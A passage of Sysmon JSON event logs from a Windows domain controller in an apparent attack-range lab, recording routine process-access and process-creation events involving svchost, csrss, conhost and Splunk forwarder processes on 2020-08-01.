C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.123\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FB7-5F25-0000-00108DDD0400}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.123","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FB7-5F25-0000-00108DDD0400}","TargetProcessId":"4200","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nProcessGuid: {41C8662E-1FB7-5F25-0000-001051DF0400}\r\nProcessId: 4240\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","ProcessGuid":"{41C8662E-1FB7-5F25-0000-001051DF0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2729,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3076\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FB7-5F25-0000-001051DF0400}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3076","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FB7-5F25-0000-001051DF0400}","TargetProcessId":"4240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2730,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FB7-5F25-0000-001051DF0400}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FB7-5F25-0000-001051DF0400}","TargetProcessId":"4240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2731,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2732,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
